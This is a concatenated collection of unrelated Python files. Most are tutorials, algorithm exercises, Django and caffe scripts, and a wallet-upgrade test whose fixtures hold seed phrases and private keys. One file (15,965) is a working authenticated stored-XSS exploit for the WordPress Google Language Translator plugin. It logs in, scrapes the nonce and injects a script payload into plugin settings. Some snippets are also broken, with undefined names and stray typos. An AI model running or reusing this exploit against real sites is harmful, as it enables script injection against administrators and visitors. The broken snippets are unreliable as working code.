15,954 | 6d8814e4dbd4926e5989c89d44a0bd12839bd100 | ### 8/20/2020
### Using arbitrary keyword arguments
def seat_profile(first_name, last_name, **passenger_info):
"""Build a dictionary containing all passenger information"""
profile = {}
profile['first_name'] = first
profile['last_name'] = last
for key, value in passenger_info.items():
profile[key] = value
return profile
passenger_profile = seat_profile('v', 'kim', 'breakfast_ordered:' == "yes", seat_number = 35)
print(passenger_profile)
|
15,955 | e531793fa19d52a5164166677384f10273ce3b82 | import shutil
import tempfile
import os
import json
from typing import Optional
import asyncio
import electrum_mona
from electrum_mona.wallet_db import WalletDB
from electrum_mona.wallet import Wallet
from electrum_mona import constants
from electrum_mona import util
from .test_wallet import WalletTestCase
# TODO add other wallet types: 2fa, xpub-only
# TODO hw wallet with client version 2.6.x (single-, and multiacc)
class TestStorageUpgrade(WalletTestCase):
def setUp(self):
super().setUp()
self.asyncio_loop, self._stop_loop, self._loop_thread = util.create_and_start_event_loop()
def tearDown(self):
super().tearDown()
self.asyncio_loop.call_soon_threadsafe(self._stop_loop.set_result, 1)
self._loop_thread.join(timeout=1)
def testnet_wallet(func):
# note: it's ok to modify global network constants in subclasses of SequentialTestCase
def wrapper(self, *args, **kwargs):
constants.set_testnet()
try:
return func(self, *args, **kwargs)
finally:
constants.set_mainnet()
return wrapper
##########
def test_upgrade_from_client_2_9_3_seeded(self):
wallet_str = '{"addr_history": {"M86vvgYRgPBW3QfyUnxbKBeUzbGtgp6NXG": [],"M98MvBtibhTcnz8tLPNk3ooFDE5qpck83r": [],"M9caHU9o66Wvmc2gqqW2DHPcnshqdj36kG": [],"MABcFFZv7v3FRAEKU5kqoB6xt9VKupEt8K": [],"MAeRNwBYorbvbeAwiJfp7cEiPHThPhcut2": [],"MBMpHGd7nKhFn7SPYkNb2SJd8WiGpTH5aB": [],"MBavRPSte8woScUxXQwybiwvvWNpEZ1WWy": [],"MC9S8ipqNu4pjodYA7ns6sS15GEEUqeuU3": [],"MEhUENYZXhwuKtiCYep6AjpRGqLBLLxa4y": [],"MFbXqsdyVSnEGmGMpduND5kp93ExhYgtbu": [],"MFgJcgrbEnV1ANbPcAsAV7ADBF63NEpXK3": [],"MGUJMzZeA1PBUsv3rUNcjLzVnAjaWkS95n": [],"MGtCxT8kLcqqi66Spwr98JnYSYJHU7ShGZ": [],"MGwggCpjuwpCfbjTCbYoX1ngzNSUnTEtEn": [],"MLoyw8Bt5zVoVRcFxUPbKuW5FF3NNfLUVf": [],"MLy8usGiKXVqo4VtWAUq1jdgKASdN8JTij": [],"MPMNgAeu7B6PTr9WVM9mhRycmQVy14VUvL": [],"MPQzvFN6fvcdwZC1KsrjagZizdFx46yp1V": [],"MPbw4Njqk6neGMcBNmxHpDjxoBGbMPwJiL": [],"MQycguJjCxpW7qBGKHPptGqMVUP28VJhp6": [],"MRR8gRePoj33M9Sx4UDEAC1fdLhppit71k": [],"MSJTC3sSuVSyQ2Fehrxg5UkwpYQn2bkNjC": [],"MSeTEqGyJfAD6TxsFgfGwMtvWf3fbaRZeW": [],"MSi7o6WRptrcpQEZBvVX2rrZdKz5WHcXyJ": [],"MSjeTpS3Kcij8GvCnatG17mPdFd3FfF3Ra": [],"MTVWS92xnBVqopgTo3F7eYqQq24b3EQpNB": [],"MUuGCeLx98GQxq1Y2UTSQbZd7PMmc2iDAs": [],"MWfHXccPyKPeY5Nf5kSk4GsCKHhsBSymxU": []},"addresses": {"change": ["MPbw4Njqk6neGMcBNmxHpDjxoBGbMPwJiL","MPMNgAeu7B6PTr9WVM9mhRycmQVy14VUvL","MC9S8ipqNu4pjodYA7ns6sS15GEEUqeuU3","MGwggCpjuwpCfbjTCbYoX1ngzNSUnTEtEn","MGtCxT8kLcqqi66Spwr98JnYSYJHU7ShGZ","MRR8gRePoj33M9Sx4UDEAC1fdLhppit71k"],"receiving": ["MBavRPSte8woScUxXQwybiwvvWNpEZ1WWy","MABcFFZv7v3FRAEKU5kqoB6xt9VKupEt8K","MGUJMzZeA1PBUsv3rUNcjLzVnAjaWkS95n","MQycguJjCxpW7qBGKHPptGqMVUP28VJhp6","MWfHXccPyKPeY5Nf5kSk4GsCKHhsBSymxU","MAeRNwBYorbvbeAwiJfp7cEiPHThPhcut2","MSJTC3sSuVSyQ2Fehrxg5UkwpYQn2bkNjC","M98MvBtibhTcnz8tLPNk3ooFDE5qpck83r","M9caHU9o66Wvmc2gqqW2DHPcnshqdj36kG","MBMpHGd7nKhFn7SPYkNb2SJd8WiGpTH5aB","MSjeTpS3Kcij8GvCnatG17mPdFd3FfF3Ra","MEhUENYZXhwuKtiCYep6AjpRGqLBLLxa4y","MLy8usGiKXVqo4VtWAUq1jdgKASdN8JTij","MFbXqsdyVSnEGmGMpduND5kp93ExhYgtbu","MSi7o6WRptrcpQEZBvVX2rrZdKz5WHcXyJ","MFgJcgrbEnV1ANbPcAsAV7ADBF63NEpXK3","M86vvgYRgPBW3QfyUnxbKBeUzbGtgp6NXG","MLoyw8Bt5zVoVRcFxUPbKuW5FF3NNfLUVf","MPQzvFN6fvcdwZC1KsrjagZizdFx46yp1V","MUuGCeLx98GQxq1Y2UTSQbZd7PMmc2iDAs","MTVWS92xnBVqopgTo3F7eYqQq24b3EQpNB","MSeTEqGyJfAD6TxsFgfGwMtvWf3fbaRZeW"]},"keystore": {"seed": "cereal wise two govern top pet frog nut rule sketch bundle logic","type": "bip32","xprv": "xprv9s21ZrQH143K29XjRjUs6MnDB9wXjXbJP2kG1fnRk8zjdDYWqVkQYUqaDtgZp5zPSrH5PZQJs8sU25HrUgT1WdgsPU8GbifKurtMYg37d4v","xpub": "xpub661MyMwAqRbcEdcCXm1sTViwjBn28zK9kFfrp4C3JUXiW1sfP34f6HA45B9yr7EH5XGzWuTfMTdqpt9XPrVQVUdgiYb5NW9m8ij1FSZgGBF"},"pruned_txo": {},"seed_type": "standard","seed_version": 14,"stored_height": 1298303,"transactions": {},"tx_fees": {},"txi": {},"txo": {},"use_encryption": false,"verified_tx3": {},"wallet_type": "standard","winpos-qt": [100,100,840,400]}'
self._upgrade_storage(wallet_str)
def test_upgrade_from_client_2_9_3_importedkeys(self):
wallet_str = '{"addr_history": {"MJNDhNyzYPbcFE5uZAg2j6YyUQVdLDhuP3": []}, "addresses": {"change": [], "receiving": ["MJNDhNyzYPbcFE5uZAg2j6YyUQVdLDhuP3"]}, "keystore": {"keypairs": {"03c2725dae5de0cbf0101cf57a3aadfb301bc3b432fa8ea38515198e41df12199f": "TPxZYPTaBiwFVo5kVmBYuJctGVDMRaCLNEEu8nsxLednda1zmVGS"}, "type": "imported"}, "pruned_txo": {}, "seed_version": 13, "stored_height": 1244824, "transactions": {}, "tx_fees": {}, "txi": {}, "txo": {}, "use_encryption": false, "verified_tx3": {}, "wallet_type": "standard", "winpos-qt": [314, 230, 840, 400]}'
self._upgrade_storage(wallet_str)
def test_upgrade_from_client_2_9_3_watchaddresses(self):
wallet_str = '{"addr_history": {"MFMy9FwJsV6HiN5eZDqDETw4pw52q3UGrb": []}, "addresses": ["MFMy9FwJsV6HiN5eZDqDETw4pw52q3UGrb"], "pruned_txo": {}, "seed_version": 13, "stored_height": 1244820, "transactions": {}, "tx_fees": {}, "txi": {}, "txo": {}, "verified_tx3": {}, "wallet_type": "imported", "winpos-qt": [100, 100, 840, 400]}'
self._upgrade_storage(wallet_str)
def test_upgrade_from_client_2_9_3_multisig(self):
wallet_str = '{"addr_history": {"P8ot4kcLZQaFfEV7RjVktxi7GQ1LUgDV1F": [],"P9HLyBSBSSy3JZ6cQYG6UkCiQoB6ZsPZ6Z": [],"PA9ZadzWaMXEEEBfmJy3ekhnpm3BU7mQyE": [],"PAFZUHzrhi8a3yfu9StTo7i1fy7xhc5GMp": [],"PAq4wHvvJsKLeFvRKtGA19Dj5gywwju5V2": [],"PCnkbJvEgHwmy6Lx6bvVYxUSziUpdmgx4i": [],"PDtrWfnff4DBcxGyBB1fnMpg7gv1XrYZsQ": [],"PEkj8tn89LfdKCr3AqC56BrXFKeoc1a3vP": [],"PF4BYeRwvnb8T6PXVfEw6zcVBEuujUqHCy": [],"PFAiWWB7TMVWyYmUPjE3489MhSSvTpFk1p": [],"PH94CH7MDa5tRkAkzGRwrMPuFhvTL5nsRL": [],"PHUSkFkwWP9hsMtjiBzkLyhP7NgEh3RjhA": [],"PL4NEabh2Q7yZEhY7TFSyq7JQEZ7zr65X2": [],"PPDDRcW6SvwcY68HBHPnFgQ1FmaRxCTWBf": [],"PPuJCCfP24gyUkLH8bVG4WJoFuw1Vktk47": [],"PQbo5pSf85CNH65W8zfXx1jVbvpkXFAH4q": [],"PRbupBpgfzRjoRGNqxERvzavJxRYPiDhfL": [],"PRnKJNuZpXDzJkWVTczMKUcQabWJVQX251": [],"PSJy76AemtebcepCwbsxnKoKVBwt94UbWD": [],"PSRoFQvkAmBqt151uNxH4ZB15NWVYC6JNQ": [],"PSTsTodTzJoHsHtUhCYoK5Lpu6TXHQ5Udm": [],"PSYcYiD1FaXpJAjFYkwN5opsrLMhQdphfz": [],"PSyjnkncpTntycMfaQTjdA7dDYWExKsnGD": [],"PT4Z5AjuZDCFXpFiDh8dcqujuGygadMkCd": [],"PVwTXpiNsH5gmaxHyCFinvXtByxhM3hSoF": [],"PWaXrnSr5QbnfYiwC6n1Tww8vs3BTUKRC6": [],"PWfGT1PQ5EXmrhjqJVeE4HUZcvNfhiRj9P": []},"addresses": {"change": ["P8ot4kcLZQaFfEV7RjVktxi7GQ1LUgDV1F","PRbupBpgfzRjoRGNqxERvzavJxRYPiDhfL","PPDDRcW6SvwcY68HBHPnFgQ1FmaRxCTWBf","PT4Z5AjuZDCFXpFiDh8dcqujuGygadMkCd","PAFZUHzrhi8a3yfu9StTo7i1fy7xhc5GMp","PH94CH7MDa5tRkAkzGRwrMPuFhvTL5nsRL"],"receiving": ["PVwTXpiNsH5gmaxHyCFinvXtByxhM3hSoF","PA9ZadzWaMXEEEBfmJy3ekhnpm3BU7mQyE","PL4NEabh2Q7yZEhY7TFSyq7JQEZ7zr65X2","PHUSkFkwWP9hsMtjiBzkLyhP7NgEh3RjhA","PPuJCCfP24gyUkLH8bVG4WJoFuw1Vktk47","PDtrWfnff4DBcxGyBB1fnMpg7gv1XrYZsQ","PEkj8tn89LfdKCr3AqC56BrXFKeoc1a3vP","PF4BYeRwvnb8T6PXVfEw6zcVBEuujUqHCy","PFAiWWB7TMVWyYmUPjE3489MhSSvTpFk1p","PAq4wHvvJsKLeFvRKtGA19Dj5gywwju5V2","PSyjnkncpTntycMfaQTjdA7dDYWExKsnGD","PSRoFQvkAmBqt151uNxH4ZB15NWVYC6JNQ","PSJy76AemtebcepCwbsxnKoKVBwt94UbWD","PSTsTodTzJoHsHtUhCYoK5Lpu6TXHQ5Udm","P9HLyBSBSSy3JZ6cQYG6UkCiQoB6ZsPZ6Z","PSYcYiD1FaXpJAjFYkwN5opsrLMhQdphfz","PRnKJNuZpXDzJkWVTczMKUcQabWJVQX251","PWaXrnSr5QbnfYiwC6n1Tww8vs3BTUKRC6","PWfGT1PQ5EXmrhjqJVeE4HUZcvNfhiRj9P","PCnkbJvEgHwmy6Lx6bvVYxUSziUpdmgx4i","PQbo5pSf85CNH65W8zfXx1jVbvpkXFAH4q"]},"pruned_txo": {},"seed_version": 14,"stored_height": 1479743,"transactions": {},"tx_fees": {},"txi": {},"txo": {},"use_encryption": false,"verified_tx3": {},"wallet_type": "2of2","winpos-qt": [100,100,840,400],"x1/": {"seed": "speed cruise market wasp ability alarm hold essay grass coconut tissue recipe","type": "bip32","xprv": "xprv9s21ZrQH143K48ig2wcAuZoEKaYdNRaShKFR3hLrgwsNW13QYRhXH6gAG1khxim6dw2RtAzF8RWbQxr1vvWUJFfEu2SJZhYbv6pfreMpuLB","xpub": "xpub661MyMwAqRbcGco98y9BGhjxscP7mtJJ4YB1r5kUFHQMNoNZ5y1mptze7J37JypkbrmBdnqTvSNzxL7cE1FrHg16qoj9S12MUpiYxVbTKQV"},"x2/": {"type": "bip32","xprv": null,"xpub": "xpub661MyMwAqRbcGrCDZaVs9VC7Z6579tsGvpqyDYZEHKg2MXoDkxhrWoukqvwDPXKdxVkYA6Hv9XHLETptfZfNpcJZmsUThdXXkTNGoBjQv1o"}}'
self._upgrade_storage(wallet_str)
##########
plugins: 'electrum_mona.plugin.Plugins'
@classmethod
def setUpClass(cls):
super().setUpClass()
from electrum_mona.plugin import Plugins
from electrum_mona.simple_config import SimpleConfig
cls.__electrum_path = tempfile.mkdtemp()
config = SimpleConfig({'electrum_path': cls.__electrum_path})
gui_name = 'cmdline'
# TODO it's probably wasteful to load all plugins... only need Trezor
cls.plugins = Plugins(config, gui_name)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
shutil.rmtree(cls.__electrum_path)
cls.plugins.stop()
cls.plugins.stopped_event.wait()
def _upgrade_storage(self, wallet_json, accounts=1) -> Optional[WalletDB]:
if accounts == 1:
# test manual upgrades
db = self._load_db_from_json_string(wallet_json=wallet_json,
manual_upgrades=True)
self.assertFalse(db.requires_split())
if db.requires_upgrade():
db.upgrade()
self._sanity_check_upgraded_db(db)
# test automatic upgrades
db2 = self._load_db_from_json_string(wallet_json=wallet_json,
manual_upgrades=False)
self._sanity_check_upgraded_db(db2)
return db2
else:
db = self._load_db_from_json_string(wallet_json=wallet_json,
manual_upgrades=True)
self.assertTrue(db.requires_split())
split_data = db.get_split_accounts()
self.assertEqual(accounts, len(split_data))
for item in split_data:
data = json.dumps(item)
new_db = WalletDB(data, manual_upgrades=False)
self._sanity_check_upgraded_db(new_db)
def _sanity_check_upgraded_db(self, db):
self.assertFalse(db.requires_split())
self.assertFalse(db.requires_upgrade())
wallet = Wallet(db, None, config=self.config)
asyncio.run_coroutine_threadsafe(wallet.stop(), self.asyncio_loop).result()
@staticmethod
def _load_db_from_json_string(*, wallet_json, manual_upgrades):
db = WalletDB(wallet_json, manual_upgrades=manual_upgrades)
return db
|
15,956 | 21734c02e6899f155c815b6aa64a5596c8fa6472 | import io
from django.conf import settings
from django.core.management import BaseCommand
from buyer.models import Buyer
from core.helpers import generate_csv, upload_file_object_to_s3
class Command(BaseCommand):
help = 'Generate the FAB buyers CSV dump and uploads it to S3.'
def handle(self, *args, **options):
file_object = self.generate_csv_file()
key = settings.BUYERS_CSV_FILE_NAME
upload_file_object_to_s3(
file_object=file_object,
key=key,
bucket=settings.AWS_STORAGE_BUCKET_NAME_DATA_SCIENCE,
)
self.stdout.write(self.style.SUCCESS('All done, bye!'))
@staticmethod
def generate_csv_file():
csv_excluded_fields = ('buyeremailnotification',)
file_object = io.StringIO()
generate_csv(file_object=file_object, queryset=Buyer.objects.all(), excluded_fields=csv_excluded_fields)
return file_object
|
15,957 | 064b6130bc10227ea8349d7a04279b9067a573b4 | from django.apps import AppConfig
class WebDemoConfig(AppConfig):
name = 'web_demo'
|
15,958 | 288e8b579bee64ca61b95edbefb04a45c4d2afaa | # 78.子集(Medium)
# 题目描述:
# 给定一组不含重复元素的整数数组 nums,返回该数组所有可能的子集(幂集)。
# 说明:解集不能包含重复的子集,[1, 2] 和 [2, 1] 这种子集算重复
# 示例:
# 输入: nums = [1,2,3]
# 输出:
# [[3],
# [1],
# [2],
# [1,2,3],
# [1,3],
# [2,3],
# [1,2],
# []]
class Solution(object):
def subsets(self, nums):
"""
:type nums: List[int]
:rtype: List[List[int]]
"""
def backtrack(nums,path,start,res):
res.append(path[:])
for i in range(start,len(nums)):
path.append(nums[i])
backtrack(nums,path,i+1,res)
path.pop()
res = []
if len(nums) == 0:
return [[]]
backtrack(nums,[],0,res)
return res
if __name__ == '__main__':
nums = [1,2,3]
sl = Solution()
res = sl.subsets(nums)
print(res)
|
15,959 | 4420fcf7dff3fdf0c1851d4bb5e8db0d704abc06 | '''
创建集合使用 {} 或 set() ,但是如果要创建空集合只能使用set(),因为{} 用来创建空字典
'''
s1 = {10, 20, 40, 50}
# add()
# s1.add(100)
# s1.add(10)
# print(s1)
# update() 增加的数据是序列
# s1.update([10, 20, 30, 40])
# print(s1)
# remove() 删除集合中的制定数据,如果数据不存在则报错
# s1.remove(10)
# discard() 删除集合中的制定数据,如果数据不存在也不会报错
# s1.discard(20)
# pop()
# del_num = s1.pop()
# print(s1)
# print(del_num)
# 查找数据
# in: 判断数据在集合序列
# not in:
|
15,960 | 12277b4e22f9a5f0f6a9cbbd2026ca2a4d6ca047 | __author__ = 'Esmidth'
class stepper:
def __getitem__(self, item):
return self.data[item]
x = stepper()
x.data = 'Spam'
print(x[1])
for item in x:
print(item)
print('a' in x) |
15,961 | 79176269d65c1f0a9ae74e49e6ba090849a0728a | import msgpack
from nanomsg import (
PUB,
SUB,
SUB_SUBSCRIBE,
PAIR,
DONTWAIT,
Socket,
NanoMsgAPIError,
EAGAIN
)
class Channel(object):
type_map = {
'Sub': SUB,
'Pub': PUB,
'Pair': PAIR
}
def __init__(self, address, channel_type, is_server):
self.__socket = Socket(self.type_map[channel_type])
if is_server:
self.__socket.bind(address)
else:
self.__socket.connect(address)
if channel_type == 'Sub':
self.__socket.set_string_option(SUB, SUB_SUBSCRIBE, '')
def recv(self, blocking=True):
if blocking:
result = self.__socket.recv()
else:
try:
result = self.__socket.recv(flags=DONTWAIT)
except NanoMsgAPIError as error:
if error.errno == EAGAIN:
return None
return msgpack.unpackb(result)
def send(self, msg):
return self.__socket.send(msgpack.packb(msg))
|
15,962 | 64d87fec80e32d04c21cf281d7f36ee5a080f7bf | #!/usr/bin/env python3 -B
import unittest
from cromulent import vocab
from tests import TestKnoedlerPipelineOutput, classified_identifiers
vocab.add_attribute_assignment_check()
class PIRModelingTest_AR38(TestKnoedlerPipelineOutput):
'''
AR-38: Knoedler stock numbers not correctly identified on physical object model
'''
def test_modeling_ar38(self):
output = self.run_pipeline('ar38')
objects = output['model-object']
obj = objects['tag:getty.edu,2019:digital:pipeline:REPLACE-WITH-UUID:knoedler#Object,2391']
self.assertEqual(classified_identifiers(obj), {
'Stock Number': '2391',
'Title': 'Head of young girl',
})
if __name__ == '__main__':
unittest.main()
|
15,963 | 067337f07f9d652a02891205fd175a4901a5a2c9 | # Given an m x n matrix board containing 'X' and 'O', capture all regions that are 4-directionally surrounded by 'X'.
# A region is captured by flipping all 'O's into 'X's in that surrounded region.
#
# Example 1:
#
# Input: board = [["X","X","X","X"],["X","O","O","X"],["X","X","O","X"],["X","O","X","X"]]
# Output: [["X","X","X","X"],["X","X","X","X"],["X","X","X","X"],["X","O","X","X"]]
# Explanation: Surrounded regions should not be on the border, which means that any 'O' on the border of the board are not flipped to 'X'. Any 'O' that is not on the border and it is not connected to an 'O' on the border will be flipped to 'X'. Two cells are connected if they are adjacent cells connected horizontally or vertically.
#
# Example 2:
#
# Input: board = [["X"]]
# Output: [["X"]]
#
# Constraints:
#
# m == board.length
# n == board[i].length
# 1 <= m, n <= 200
# board[i][j] is 'X' or 'O'.
"""
Do not return anything, modify board in-place instead.
"""
# DFS
#
# Idea
# 1) Check four borders. If it is O, change it and all its neighbor to temporary #
# 2) Change all O to X
# 3) Change all # to O
#
# Example
# X X X X X X X X X X X X
# X X O X -> X X O X -> X X X X
# X O X X X # X X X O X X
# X O X X X # X X X O X X
class Solution:
def solve(self, board: List[List[str]]) -> None:
if not board:
return
m, n = len(board), len(board[0])
dirs = [(1, 0), (-1, 0), (0, 1), (0, -1)]
def go(x, y):
if 0 <= x < m and 0 <= y < n and board[x][y] == "O":
board[x][y] = "#"
for dx, dy in dirs:
go(x + dx, y + dy)
# Change every square connected to left and right borders from O to temporary #
for i in range(m):
go(i, 0)
go(i, n - 1)
# Change every square connected to top and bottom borders from O to temporary #
for j in range(n):
go(0, j)
go(m - 1, j)
# Change every temporary # to O
for i in range(m):
for j in range(n):
# Change the rest of O to X
if board[i][j] == "O":
board[i][j] = "X"
# Change temporary # back to O
if board[i][j] == "#":
board[i][j] = "O"
|
15,964 | e5181e4bca3367d66726d37d007a4712649cab98 | # -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
x=100
n=2
def raiz(x,n):
r=x**(1/float(n))
return r
print(raiz(x,n)) |
15,965 | f39931f5bc2fdea0107199f14db4e38227979514 | #/usr/bin/env python3
import requests
import re
import sys
from termcolor import colored
(banner) = """
__ __ _
\ \ / /__ _ __ __| |_ __ _ __ ___ ___ ___
\ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|
\ V V / (_) | | | (_| | |_) | | | __/\__ \__ \
\_/\_/ \___/|_| \__,_| .__/|_| \___||___/___/
|_|
Authenticated Stored XSS - Translate WordPress – Google Language Translator
by https://github.com/apapedulimu
"""
print(colored(banner, 'green'))
print(colored("usage : \n======= \npython3 exploit.py http://<IP>:<PORT>/ <Username> <Password>\n",'red'))
payload = "<h1>Hacked By Hacker</h1><img src=x onerror=alert(document.domain)>"
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
data = {
'log':username,
'pwd':password,
'wp-submit':'Log In',
'redirect_to':url+'wp-admin/',
'testcookie':1
}
r = requests.post(url+'wp-login.php',data=data)
if r.status_code == 200:
print("[+] Login successful.")
else:
print("[-] Failed to login.")
exit(0)
cookies = r.cookies
print("[+] Check Installed Plugin ")
res = requests.get(url+'wp-admin/options-general.php?page=google_language_translator',cookies=cookies)
if r.status_code == 200:
print("[+] Plugin Installed.")
else:
print("[-] Plugin not installed on the website.")
exit(0)
wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)
if len(wp_nonce_list) == 0 :
print("[-] Failed to retrieve the _wpnonce \n")
exit(0)
else :
wp_nonce = wp_nonce_list[0]
print("[+] Wp Nonce retrieved successfully !\n[+] _wpnonce : " + wp_nonce)
data = {
'option_page':'google_language_translator',
'_wpnonce': wp_nonce,
'action':'update',
'googlelanguagetranslator_active':'1',
'googlelanguagetranslator_floating_widget':'yes',
'googlelanguagetranslator_floating_widget_text': payload
}
res = requests.post(url+'wp-admin/options.php',data=data, cookies=cookies)
if res.status_code == 200:
print("[+] Exploit Success.\n[+] Open "+url+"wp-admin/options-general.php?page=google_language_translator")
else:
print("[-] Exploit Failed.")
exit(0)
|
15,966 | 04e896e7d4d04e37baf3281788f4b1ed5743049d | from database import Base
from sqlalchemy import Column, Integer, String, SmallInteger, ForeignKey, Float
from sqlalchemy import DateTime, func
from datetime import datetime
from sqlalchemy.orm import relationship
from models.users import User
class Transaction(Base):
__tablename__ = "transactions"
id = Column(Integer, primary_key=True)
date_created = Column(DateTime, nullable=False, default=datetime.utcnow)
date_processed = Column(DateTime, nullable=False)
status = Column(SmallInteger, nullable=False)
total_price = Column(Float, nullable=False)
total_tiles = Column(Integer, nullable=False)
user_id = Column(Integer, ForeignKey('users.id'), nullable=True)
user = relationship("User", backref="transactions")
def __init__(self, date_created, date_processed, status, total_price, total_tiles, user_id):
self.date_created = date_created
self.date_processed = date_processed
self.status = status
self.total_price = total_price
self.total_tiles = total_tiles
self.user_id = user_id
def __repr__(self):
return """<Transaction(date_created'{0}', date_processed'{1}', status'{2}', total_price'{3}',
total_tiles'{4}', user_id'{5}'>""".format(
self.date_created, self.date_processed, self.status, self.total_price, self.total_tiles,
self.user_id)
|
15,967 | 9a8f977a732ddca744a53e4cd488110d1ca1087d | # -*- coding: utf-8 -*-
"""
Created on Sun Mar 26 19:32:24 2017
@author: xu.2727
using my pre-trained net to extract features
"""
import caffe
import numpy as np
import os
import scipy.io as sio
from random import shuffle
from PIL import Image
import pdb
class_map = {
(255,255,255):0,
(0,0,255):1,
(0,255,255):2,
(0,255,0):3,
(255,255,0):4,
(255,0,0):5
}
name_map = {
0:'surface',
1:'Building',
2:'low vegetation',
3:'Tree',
4:'Car',
5:'Background'
}
kernel_size = 224
mask_path = r'' #path to mask image
image_path = r'' #path to image
mat_root = r'' #path to height information
file_path = r""
output_root = r"" #path to store the extracted features
batch = 10 #batch size
featureLen = 512 # feature dim
img_list = [1, 3, 5, 7, 11, 13, 15, 17, 21, 23, 26, 28, 30, 32, 34, 37]
start_idx = 0
category_list = ["building", "surface", "vegetationTree"]
for c_idx in range(0, len(category_list)):
if(os.path.isdir(os.path.join(output_root, category_list[c_idx])) == False):
os.mkdir(os.path.join(output_root, category_list[c_idx]))
print(category_list[c_idx])
if c_idx == 0:
positive_class = [1]
if c_idx == 1:
positive_class = [0]
if c_idx == 2:
positive_class = [2,3]
folder_name = os.path.join('Mynetwork', category_list[c_idx])#!
caffe_model = ""#path to caffe model
define_file = ""#path to caffe deploy file
model_file = os.path.join(file_path, caffe_model)
prototxt_file = os.path.join(file_path, define_file)
caffe.set_mode_cpu()
net = caffe.Net(prototxt_file, model_file, caffe.TEST)
extract_layer = 'fc0' #extract features of FC0
for img_idx in range(start_idx, len(img_list)):
print(img_list[img_idx])
origin_name = 'top_mosaic_09cm_area' + str(img_list[img_idx]) + '.tif'
mask_name = 'top_mosaic_09cm_area' + str(img_list[img_idx]) + '.tif'
dsm_path = mat_root + '\\' + str(img_idx) + '_data.mat'
dsmfile = sio.loadmat(dsm_path)
dsm = dsmfile['result']
dsm = dsm * 255
mask = Image.open(os.path.join(mask_path, mask_name))#get label
origin = Image.open(os.path.join(image_path, origin_name))# get Data
origin = np.asarray(origin)
mask = np.asarray(mask)
img_height = mask.shape[0]
img_width = mask.shape[1]
patch_list = []
pos_count = 0
stride = 100
for i in range(kernel_size, img_height):
for j in range(kernel_size, img_width):
temp_class = class_map[tuple(mask[i - kernel_size / 2][j - kernel_size / 2])]
if temp_class in positive_class:
if pos_count % stride == 0:
patch_list.append(((i,j),temp_class))
pos_count += 1
training_sample = len(patch_list)
shuffle(patch_list)
rd = training_sample / batch
training_sample = rd * batch
mat_coordfile = os.path.join(output_root, category_list[c_idx], str(img_list[img_idx]) + '_coord.mat')#save coordination of each pixel
mat_classfile = os.path.join(output_root, category_list[c_idx], str(img_list[img_idx]) + '_class.mat')#save each pixel's corresponding class
coord = np.zeros((training_sample, 2))
classid = np.zeros((training_sample,1))
for idx, val in enumerate(patch_list):
if idx >= training_sample: break
coord[idx][0] = val[0][0]
coord[idx][1] = val[0][1]
classid[idx] = val[1]
sio.savemat(mat_coordfile, {'coord' : coord})
sio.savemat(mat_classfile, {'classid' : classid})
feature_file = os.path.join(output_root, category_list[c_idx], str(img_list[img_idx]) + '_featureMap.mat')
feature_map = np.ones((training_sample, featureLen))
for temp_rd in range(rd):
X_train = np.zeros((batch, 6, kernel_size, kernel_size), dtype = np.uint8)#input data
for j in range(batch):
idx = temp_rd * batch + j
x = patch_list[idx][0][0]
y = patch_list[idx][0][1]
X_copy = origin[x - kernel_size:x, y - kernel_size:y].copy()
X_copy = X_copy[:,:,::-1]
X_train[j][:3] = X_copy.transpose(2,0,1)
net.forward_all(data = X_train)
temp_data = net.blobs[extract_layer].data
temp_data.astype(float)
feature_map[temp_rd * batch : temp_rd * batch + batch] = temp_data
sio.savemat(feature_file, {'feature_map' : feature_map})
|
15,968 | 2b2ad73cfe1439a2d478024bc6a868c28cfa4dfe | #!/usr/bin/env python
#-*-coding:utf8-*-
import re
import requests
url = 'https://pt.sjtu.edu.cn/torrents.php?inclbookmarked=0&incldead=0&spstate=0&cat=429&page=0'
class spider:
def __init__(self):
self.url = url
print "start crawling ..."
def getContent(self):
response = requests.get(self.url)
return response.content
# def getEachLesson(self,):
if __name__=='__main__':
putaospider = spider()
print putaospider.getContent()
|
15,969 | fb361cf718c6ccf03cb12ce00cf52db48a1a1593 | from random import randint
c = randint(1,50)
for var in range(1,6) :
u = int(input("Your guess : "))
if u < c :
print("Be Big Think Big")
elif u > c :
print("Be in limits and think lower")
else :
print("You have won the game ")
break
if var == 5 :
print("You such a looser : ")
print("computer guess was : ",cq
|
15,970 | 05bfd69829a9adf6b0877ea98a2ee2c854eb23f3 | import feedparser
from variables import get_variable_value_cascaded,expand_string_variables,safe_parse_split
def check_for_new_links(feed):
"""Given the normal feed object, return a list of new feed entries. Ordered oldest to newest."""
#read the feed
feed_url = feed["feed_url"]
feed_data = feedparser.parse(feed_url)
#parse out entries in the feed for the information we want
entries = []
for entry in feed_data.entries:
parsed_entry = {}
parsed_entry["title"] = entry["title"]
parsed_entry["link"] = entry["link"]
parsed_entry["published"] = entry["published"]
parsed_entry["feed_url"] = feed_url
entries.append(parsed_entry)
#check for new entries since the last known entry
#chop off all entries starting at the last_seen_link
if "last_seen_link" in feed:
last_link = feed["last_seen_link"]
idx = -1
for cidx in range(len(entries)):
if entries[cidx]["link"] == last_link:
idx = cidx
break
#else is a new link
entries = entries[:idx]
return list(reversed(entries))
def check_if_feed_marked_for_deletion(defaults,group,feed):
equaltiy_condition = None
try:
equaltiy_condition = get_variable_value_cascaded(defaults,group,feed,{},"remove_feed_if_equal",print=False)
except:
return False # no condition specified to delete things
try:
args = safe_parse_split(equality_condition," ")
if len(args) != 2:
return False # bad format for the equality condition
args[0] = expand_string_variables(defaults,group,feed,{},args[0])
args[1] = expand_string_variables(defaults,group,feed,{},args[1])
if args[0] == args[1]:
return True
except Exception as e:
print(e)
pass # no specified condition to remove this feed
return False # not ready to be removed
|
15,971 | 8917e9761208c9138707a265d5d2c8c715db6895 | from pwn import *
p=remote('shell.actf.co',19010)
#p=process('./o')
def do_write(n):
code=''
for i in range(3):
byte = (n>>(i*8))&0xff
root = int(byte**0.5)
code += '+'*(byte-root*root)+'>'
code += '[-]'+root*'+'
code += '[<'+'+'*root+'>-]'
#clean
for i in range(2):
code += '>[-]'
return code
p.recvuntil('code: ')
code = '+[>+]'
code += '>'*0x28
code += '[-]'
code += do_write(0x4011c6)
print len(code)
p.sendline(code)
p.interactive()
|
15,972 | 867661597d32e503e5acdbddb3ad54d7c885fff2 | # -------------
# This module delivers helper functions
# to get a driver instance for the chrome webdriver
